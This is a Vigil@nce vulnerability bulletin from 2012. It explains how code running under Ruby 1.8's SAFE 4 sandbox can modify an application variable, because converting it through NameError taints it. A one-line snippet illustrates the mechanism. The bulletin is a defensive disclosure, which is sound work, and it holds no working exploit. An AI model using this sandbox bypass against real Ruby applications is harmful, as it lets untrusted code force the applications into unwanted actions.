Vigil@nce: Ruby 1.8, modify a variable via NameError despite SAFE 4
October 2012 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
When a Ruby 1.8 application allows an external code to be executed
in SAFE 4 mode, it can use NameError, in order to modify a
variable of the application.
– Impacted products: Unix (platform)
– Severity: 2/4
– Creation date: 08/10/2012
DESCRIPTION OF THE VULNERABILITY
The security level "$SAFE = 4" limits features that the Ruby code
is allowed to use. For example, in SAFE 4 mode, a Rudy code is not
allowed to modify a tainted (internal) string. The SAFE4 mode is
usually used to execute code coming from an untrusted source, such
as a plugin.
A NameError can be converted to a string. For example:
Exception.new($variable).to_s
However, this function automatically taints the variable with
OBJ_INFECT(). As the variable becomes tainted, the SAFE 4 mode
does not forbid its modification.
This vulnerability only impacts Ruby 1.8. It is similar to
VIGILANCE-VUL-11993 (https://vigilance.fr/tree/1/11993), but its
origin is a variant of CVE-2011-1005 (VIGILANCE-VUL-10383
(https://vigilance.fr/tree/1/10383)).
When a Ruby 1.8 application allows an external code to be executed
in SAFE 4 mode, it can therefore use NameError, in order to modify
a variable of the application. Depending on the modified variable,
the application can then be forced to perform unwanted tasks.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Ruby-1-8-modify-a-variable-via-NameError-despite-SAFE-4-12003